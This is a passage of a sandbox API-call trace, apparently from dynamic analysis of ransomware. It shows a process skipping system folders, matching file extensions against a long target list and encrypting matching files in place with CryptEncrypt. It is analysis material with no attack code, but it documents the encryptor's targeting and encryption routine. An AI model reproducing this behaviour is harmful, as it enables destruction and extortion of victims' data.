lpSystemInfo=0x31cdfe4*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0028.788] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7c4) returned 0xa0000 [0028.793] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0028.793] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7c4) returned 0xa0000 [0028.794] CryptEncrypt (in: hKey=0x3683b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa0000*, pdwDataLen=0x31ce070*=0x7c4, dwBufLen=0x7d0 | out: pbData=0xa0000*, pdwDataLen=0x31ce070*=0x7d0) returned 1 [0028.794] FlushViewOfFile (lpBaseAddress=0xa0000, dwNumberOfBytesToFlush=0x7d0) returned 1 [0028.796] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0028.796] GetSystemInfo (in: lpSystemInfo=0x31cdfe4 | out: lpSystemInfo=0x31cdfe4*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0028.796] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7f2) returned 0xa0000 [0028.799] CryptDuplicateHash (in: hHash=0x368270, pdwReserved=0x0, dwFlags=0x0, phHash=0x31ce020 | out: phHash=0x31ce020) returned 1 [0028.799] CryptHashData (hHash=0x368430, pbData=0xa07cc, dwDataLen=0x4, dwFlags=0x0) returned 1 [0028.800] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x36ea40 [0028.800] CryptGetHashParam (in: hHash=0x368430, dwParam=0x2, pbData=0x36ea40, pdwDataLen=0x31ce010, dwFlags=0x0 | out: pbData=0x36ea40, pdwDataLen=0x31ce010) returned 1 [0028.800] FlushViewOfFile (lpBaseAddress=0xa0000, dwNumberOfBytesToFlush=0x7f2) returned 1 [0028.800] LocalFree (hMem=0x36ea40) returned 0x0 [0028.800] CryptDestroyHash (hHash=0x368430) returned 1 [0028.800] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0028.800] CloseHandle (hObject=0x230) returned 1 [0028.800] CloseHandle (hObject=0x22c) returned 1 [0028.800] CryptDestroyKey (hKey=0x3683b0) returned 1 [0028.801] FindNextFileW (in: hFindFile=0x368370, lpFindFileData=0x31ce088 | out: lpFindFileData=0x31ce088) returned 0 [0028.801] FindClose (in: hFindFile=0x368370 | out: hFindFile=0x368370) returned 1 [0028.801] FindNextFileW (in: hFindFile=0x368330, lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 1 [0028.801] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0028.801] PathCombineW (in: pszDest=0x31ce960, pszDir="C:\\MSOCache\\All Users", pszFile="{90140000-00B4-0409-1000-0000000FF1CE}-C" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C") returned="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C" [0028.801] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C", lpSrch="\\Windows") returned 0x0 [0028.801] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C", lpSrch="\\Program Files") returned 0x0 [0028.801] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C", lpSrch="\\ProgramData") returned 0x0 [0028.801] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C", lpSrch="\\AppData") returned 0x0 [0028.801] PathCombineW (in: pszDest=0x31ce4e0, pszDir="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C", pszFile="*" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\*") returned="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\*" [0028.801] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x31ce088 | out: lpFindFileData=0x31ce088) returned 0x368370 [0028.806] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0028.806] FindNextFileW (in: hFindFile=0x368370, lpFindFileData=0x31ce088 | out: lpFindFileData=0x31ce088) returned 1 [0028.806] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0028.806] FindNextFileW (in: hFindFile=0x368370, lpFindFileData=0x31ce088 | out: lpFindFileData=0x31ce088) returned 1 [0028.806] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0028.806] PathCombineW (in: pszDest=0x31ce2d8, pszDir="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C", pszFile="ProjectMUI.msi" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi") returned="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi" [0028.806] PathFindExtensionW (pszPath="ProjectMUI.msi") returned=".msi" [0028.806] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".msi.") returned 0x0 [0028.806] FindNextFileW (in: hFindFile=0x368370, lpFindFileData=0x31ce088 | out: lpFindFileData=0x31ce088) returned 1 [0028.806] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0028.806] PathCombineW (in: pszDest=0x31ce2d8, pszDir="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C", pszFile="ProjectMUI.xml" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml") returned="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml" [0028.806] PathFindExtensionW (pszPath="ProjectMUI.xml") returned=".xml" [0028.806] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".xml.") returned=".xml.xvd.zip." [0028.806] CryptDuplicateKey (in: hKey=0x37f480, pdwReserved=0x0, dwFlags=0x0, phKey=0x31ce05c | out: phKey=0x31ce05c*=0x3683b0) returned 1 [0028.806] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c [0028.807] GetFileSizeEx (in: hFile=0x22c, lpFileSize=0x31ce040 | out: lpFileSize=0x31ce040*=1452) returned 1 [0028.807] CreateFileMappingW (hFile=0x22c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x5d2, lpName=0x0) returned 0x230 [0028.807] GetSystemInfo (in: lpSystemInfo=0x31cdfe4 | out: lpSystemInfo=0x31cdfe4*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0028.807] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5ac) returned 0xa0000 [0028.814] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0028.815] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5ac) returned 0xa0000 [0028.815] CryptEncrypt (in: hKey=0x3683b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa0000*, pdwDataLen=0x31ce070*=0x5ac, dwBufLen=0x5b0 | out: pbData=0xa0000*, pdwDataLen=0x31ce070*=0x5b0) returned 1 [0028.816] FlushViewOfFile (lpBaseAddress=0xa0000, dwNumberOfBytesToFlush=0x5b0) returned 1 [0028.817] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0028.817] GetSystemInfo (in: lpSystemInfo=0x31cdfe4 | out: lpSystemInfo=0x31cdfe4*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0028.817] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5d2) returned 0xa0000 [0028.818] CryptDuplicateHash (in: hHash=0x368270, pdwReserved=0x0, dwFlags=0x0, phHash=0x31ce020 | out: phHash=0x31ce020) returned 1 [0028.818] CryptHashData (hHash=0x368430, pbData=0xa05ac, dwDataLen=0x4, dwFlags=0x0) returned 1 [0028.818] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x36ea40 [0028.818] CryptGetHashParam (in: hHash=0x368430, dwParam=0x2, pbData=0x36ea40, pdwDataLen=0x31ce010, dwFlags=0x0 | out: pbData=0x36ea40, pdwDataLen=0x31ce010) returned 1 [0028.818] FlushViewOfFile (lpBaseAddress=0xa0000, dwNumberOfBytesToFlush=0x5d2) returned 1 [0028.818] LocalFree (hMem=0x36ea40) returned 0x0 [0028.818] CryptDestroyHash (hHash=0x368430) returned 1 [0028.818] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0028.818] CloseHandle (hObject=0x230) returned 1 [0028.818] CloseHandle (hObject=0x22c) returned 1 [0028.819] CryptDestroyKey (hKey=0x3683b0) returned 1 [0028.819] FindNextFileW (in: hFindFile=0x368370, lpFindFileData=0x31ce088 | out: lpFindFileData=0x31ce088) returned 1 [0028.819] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0028.819] PathCombineW (in: pszDest=0x31ce2d8, pszDir="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C", pszFile="ProjLR.cab" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab") returned="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab" [0028.819] PathFindExtensionW (pszPath="ProjLR.cab") returned=".cab" [0028.819] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".cab.") returned=".cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip." [0028.819] CryptDuplicateKey (in: hKey=0x37f480, pdwReserved=0x0, dwFlags=0x0, phKey=0x31ce05c | out: phKey=0x31ce05c*=0x3683b0) returned 1 [0028.819] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projlr.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c [0028.819] GetFileSizeEx (in: hFile=0x22c, lpFileSize=0x31ce040 | out: lpFileSize=0x31ce040*=8265165) returned 1 [0028.819] CreateFileMappingW (hFile=0x22c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7e1df2, lpName=0x0) returned 0x230 [0028.819] GetSystemInfo (in: lpSystemInfo=0x31cdfe4 | out: lpSystemInfo=0x31cdfe4*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0028.819] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x7e0000, dwNumberOfBytesToMap=0x1dcd) returned 0xa0000 [0028.835] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0028.835] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7e1dcd) returned 0x3240000 [0028.836] CryptEncrypt (in: hKey=0x3683b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3240000*, pdwDataLen=0x31ce070*=0x7e1dcd, dwBufLen=0x7e1dd0 | out: pbData=0x3240000*, pdwDataLen=0x31ce070*=0x7e1dd0) returned 1 [0029.069] FlushViewOfFile (lpBaseAddress=0x3240000, dwNumberOfBytesToFlush=0x7e1dd0) returned 1 [0029.091] UnmapViewOfFile (lpBaseAddress=0x3240000) returned 1 [0029.141] GetSystemInfo (in: lpSystemInfo=0x31cdfe4 | out: lpSystemInfo=0x31cdfe4*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0029.141] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x7e0000, dwNumberOfBytesToMap=0x1df2) returned 0xa0000 [0029.142] CryptDuplicateHash (in: hHash=0x368270, pdwReserved=0x0, dwFlags=0x0, phHash=0x31ce020 | out: phHash=0x31ce020) returned 1 [0029.142] CryptHashData (hHash=0x368430, pbData=0xa1dcc, dwDataLen=0x4, dwFlags=0x0) returned 1 [0029.143] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x36ea40 [0029.143] CryptGetHashParam (in: hHash=0x368430, dwParam=0x2, pbData=0x36ea40, pdwDataLen=0x31ce010, dwFlags=0x0 | out: pbData=0x36ea40, pdwDataLen=0x31ce010) returned 1 [0029.143] FlushViewOfFile (lpBaseAddress=0xa0000, dwNumberOfBytesToFlush=0x1df2) returned 1 [0029.143] LocalFree (hMem=0x36ea40) returned 0x0 [0029.143] CryptDestroyHash (hHash=0x368430) returned 1 [0029.143] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0029.143] CloseHandle (hObject=0x230) returned 1 [0029.143] CloseHandle (hObject=0x22c) returned 1 [0029.143] CryptDestroyKey (hKey=0x3683b0) returned 1 [0029.143] FindNextFileW (in: hFindFile=0x368370, lpFindFileData=0x31ce088 | out: lpFindFileData=0x31ce088) returned 1 [0029.143] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0029.143] PathCombineW (in: pszDest=0x31ce2d8, pszDir="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C", pszFile="Setup.xml" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml") returned="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml" [0029.143] PathFindExtensionW (pszPath="Setup.xml") returned=".xml" [0029.143] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".xml.") returned=".xml.xvd.zip." [0029.144] CryptDuplicateKey (in: hKey=0x37f480, pdwReserved=0x0, dwFlags=0x0, phKey=0x31ce05c | out: phKey=0x31ce05c*=0x3683b0) returned 1 [0029.144] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c [0029.144] GetFileSizeEx (in: hFile=0x22c, lpFileSize=0x31ce040 | out: lpFileSize=0x31ce040*=1872) returned 1 [0029.144] CreateFileMappingW (hFile=0x22c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x782, lpName=0x0) returned 0x230 [0029.144] GetSystemInfo (in: lpSystemInfo=0x31cdfe4 | out: lpSystemInfo=0x31cdfe4*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0029.144] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x750) returned 0xa0000 [0029.145] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0029.145] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x750) returned 0xa0000 [0029.146] CryptEncrypt (in: hKey=0x3683b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa0000*, pdwDataLen=0x31ce070*=0x750, dwBufLen=0x760 | out: pbData=0xa0000*, pdwDataLen=0x31ce070*=0x760) returned 1 [0029.146] FlushViewOfFile (lpBaseAddress=0xa0000, dwNumberOfBytesToFlush=0x760) returned 1 [0029.147] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0029.147] GetSystemInfo (in: lpSystemInfo=0x31cdfe4 | out: lpSystemInfo=0x31cdfe4*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0029.147] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x782) returned 0xa0000 [0029.148] CryptDuplicateHash (in: hHash=0x368270, pdwReserved=0x0, dwFlags=0x0, phHash=0x31ce020 | out: phHash=0x31ce020) returned 1 [0029.148] CryptHashData (hHash=0x368430, pbData=0xa075c, dwDataLen=0x4, dwFlags=0x0) returned 1 [0029.148] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x36ea40 [0029.148] CryptGetHashParam (in: hHash=0x368430, dwParam=0x2, pbData=0x36ea40, pdwDataLen=0x31ce010, dwFlags=0x0 | out: pbData=0x36ea40, pdwDataLen=0x31ce010) returned 1 [0029.148] FlushViewOfFile (lpBaseAddress=0xa0000, dwNumberOfBytesToFlush=0x782) returned 1 [0029.149] LocalFree (hMem=0x36ea40) returned 0x0 [0029.149] CryptDestroyHash (hHash=0x368430) returned 1 [0029.149] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0029.149] CloseHandle (hObject=0x230) returned 1 [0029.149] CloseHandle (hObject=0x22c) returned 1 [0029.149] CryptDestroyKey (hKey=0x3683b0) returned 1 [0029.149] FindNextFileW (in: hFindFile=0x368370, lpFindFileData=0x31ce088 | out: lpFindFileData=0x31ce088) returned 0 [0029.149] FindClose (in: hFindFile=0x368370 | out: hFindFile=0x368370) returned 1 [0029.149] FindNextFileW (in: hFindFile=0x368330, lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 1 [0029.149] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0029.149] PathCombineW (in: pszDest=0x31ce960, pszDir="C:\\MSOCache\\All Users", pszFile="{90140000-00BA-0409-1000-0000000FF1CE}-C" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C") returned="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C" [0029.149] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C", lpSrch="\\Windows") returned 0x0 [0029.149] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C", lpSrch="\\Program Files") returned 0x0 [0029.149] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C", lpSrch="\\ProgramData") returned 0x0 [0029.149] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C", lpSrch="\\AppData") returned 0x0 [0029.149] PathCombineW (in: pszDest=0x31ce4e0, pszDir="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C", pszFile="*" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\*") returned="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\*" [0029.149] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x31ce088 | out: lpFindFileData=0x31ce088) returned 0x368370 [0029.150] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0029.150] FindNextFileW (in: hFindFile=0x368370, lpFindFileData=0x31ce088 | out: lpFindFileData=0x31ce088) returned 1 [0029.150] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0029.150] FindNextFileW (in: hFindFile=0x368370, lpFindFileData=0x31ce088 | out: lpFindFileData=0x31ce088) returned 1 [0029.150] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0029.150] PathCombineW (in: pszDest=0x31ce2d8, pszDir="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C", pszFile="GrooveLR.cab" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab") returned="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab" [0029.150] PathFindExtensionW (pszPath="GrooveLR.cab") returned=".cab" [0029.150] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".cab.") returned=".cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip." [0029.150] 